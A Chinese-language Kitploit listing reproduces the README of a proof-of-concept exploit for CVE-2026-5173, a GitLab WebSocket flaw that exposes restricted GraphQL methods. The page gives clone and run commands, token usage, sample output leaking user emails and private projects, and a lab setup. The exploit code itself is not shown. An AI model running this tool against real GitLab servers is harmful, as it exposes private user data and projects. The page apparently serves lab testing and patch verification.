Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-5173 — CVE-2026-5173 | Kitploit
工具/GitHubGitHub/0xblackash/cve-2026-5173
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHub0xblackash/cve-2026-5173

CVE-2026-5173

CVE-2026-5173

查看仓库
115个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🦊 CVE-2026-5173:GitLab WebSocket 未授权方法执行 PoC

Linux Vulnerability (5) (1)

CVE Badge PoC Affected Versions Python

GitHub stars License


🛠️ 概述

CVE-2026-5173 允许低权限的已认证攻击者通过 GitLab 的 WebSocket(/-/cable)端点调用受限的后端方法,尤其是通过 GraphqlChannel。

这可能导致敏感数据泄露(高机密性)以及有限的未授权操作。

受影响版本

  • GitLab CE/EE:16.9.6 至 18.8.8
  • 18.9 早于 18.9.5
  • 18.10 早于 18.10.3

已修复版本:18.8.9 • 18.9.5 • 18.10.3


⚡ 功能特性

  • 简洁现代的 Python 3 PoC
  • 一条命令即可使用:python3 CVE-2026-5173.py http://target:8080
  • 自动建立 WebSocket 连接 + GraphqlChannel 订阅
  • 多种方法枚举(currentUser、users、projects 等)
  • 支持个人访问令牌
  • 漂亮的彩色输出
  • 仅适用于经授权的实验室 / 渗透测试使用

🚀 快速开始

1. 克隆仓库

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-5173.git
cd CVE-2026-5173

2. 运行 PoC

root@kitploit:~
python3 CVE-2026-5173.py http://your-gitlab-lab:8080

使用令牌(推荐):

root@kitploit:~
python3 CVE-2026-5173.py http://target.com:8080 -t glpat-XXXXXXXXXXXXXXXXXXXX

📸 屏幕截图

示例成功输出:

root@kitploit:~
[+] CVE-2026-5173 PoC v2 - Target: http://192.168.1.100:8080
[+] WebSocket connected
[+] Subscribed to GraphqlChannel
[*] Testing method: currentUser
[SUCCESS] Possible unauthorized access via 'currentUser'!
    → Response: {"result":{"data":{"currentUser":{"id":"gid://gitlab/User/123","name":"Normal User","email":"[email protected]"}}}...

[*] Testing method: users
[SUCCESS] Possible unauthorized access via 'users'!
    → Response: {"result":{"data":{"users":{"nodes":[ {"id":"gid://gitlab/User/1","name":"Admin","email":"[email protected]"}, ... ]}}}  ← This leaks all users including admins!

[*] Testing method: projects
[SUCCESS] Possible unauthorized access via 'projects'!
    → Response: long list of ALL projects (even private ones you shouldn't see)

📋 使用方法

root@kitploit:~
python3 CVE-2026-5173.py <target> [options]

Arguments:
  target                Target URL (e.g. http://gitlab.example.com:8080)
  -t, --token           GitLab Personal Access Token (API scope)
  -h, --help            Show this help message

🧪 实验环境搭建(推荐)

root@kitploit:~
docker run -d --name gitlab-vuln \
  -p 8080:80 -p 2222:22 \
  gitlab/gitlab-ce:18.10.2-ce.0

然后创建一个普通用户并运行 PoC。


⚠️ 法律声明与免责声明

  • 本 PoC 仅供教育和授权测试使用。
  • 仅可在您拥有或已获明确授权测试的系统上使用。
  • 未经授权的使用属于违法行为。
  • 本人不对任何滥用行为负责。

📚 参考资料

  • GitLab 官方补丁发布:https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/
  • CVE 记录:https://www.cve.org/CVERecord?id=CVE-2026-5173
  • GitHub 安全公告:https://github.com/advisories/GHSA-5gj7-3j23-w2h2

用 ❤️ 为安全社区打造
如果你觉得有用,就给仓库点个 Star ⭐ 吧!

免责声明:创建时尚无公开的详细漏洞利用代码。这是一个研究级 PoC。

下载工具